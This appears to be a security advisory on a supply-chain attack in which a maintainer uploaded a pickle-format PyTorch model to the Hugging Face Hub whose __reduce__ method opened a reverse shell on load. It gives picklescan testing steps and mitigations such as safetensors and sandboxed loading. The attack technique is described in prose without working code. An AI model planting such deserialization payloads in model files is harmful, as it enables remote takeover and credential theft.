Malicious PyTorch Model on Hugging Face Hub Executes Code on Load via Unsafe Deserialization
Overview
A supply chain attack was discovered where a popular open-source model on the Hugging Face Hub was compromised by its maintainer. The attacker uploaded a new version of the model weights in the legacy `.bin` (pickle) format. This format is vulnerable to arbitrary code execution because it relies on Python's `pickle` module for deserialization. The attacker crafted the model file to include a malicious class with a custom `__reduce__` method. When a victim downloaded the model and loaded it using the standard `torch.load()` function, the `pickle` deserializer executed the `__reduce__` method, which contained a payload. The payload established a reverse shell back to the attacker's server, giving them full control over the user's machine or the CI/CD environment where the model was being loaded. This allowed for the theft of sensitive data, including API keys, cloud credentials stored in environment variables, and proprietary code. The incident highlighted the severe risks of trusting un-scanned model artifacts from public repositories and the importance of using safer serialization formats like `safetensors`, which do not have code execution capabilities.
Affected Systems
Testing Guide
1. In a secure, isolated environment, download a model in the `.bin` or `.pth` format. 2. Before loading it, run a static analysis tool like `picklescan` on the model file: `picklescan -p /path/to/model.bin`. 3. The tool will flag the file as 'dangerous' if it contains opcodes that can lead to code execution, such as `REDUCE`, `STACK_GLOBAL`, or `INST`. 4. If the scan finds dangerous opcodes, the model should be considered unsafe to load via `torch.load()`.
Mitigation Steps
1. **Use SafeTensors:** Exclusively load models using the `.safetensors` format. Configure `transformers` to enforce this by default. 2. **Model Scanning:** Before loading any model, scan it for malicious code using tools like `picklescan` or integrated Hugging Face Hub malware scanning. 3. **Isolated Loading:** Load new or untrusted models in a sandboxed, network-isolated environment to prevent any potential payload from accessing sensitive resources or communicating with the internet. 4. **Verify Sources:** Only use models from trusted, verified creators on platforms like Hugging Face. Be cautious of newly uploaded models or unexpected updates to existing ones.
Patch Details
The `transformers` library now defaults to and strongly recommends `safetensors`. Hugging Face has improved its on-platform malware scanning to detect malicious pickle payloads.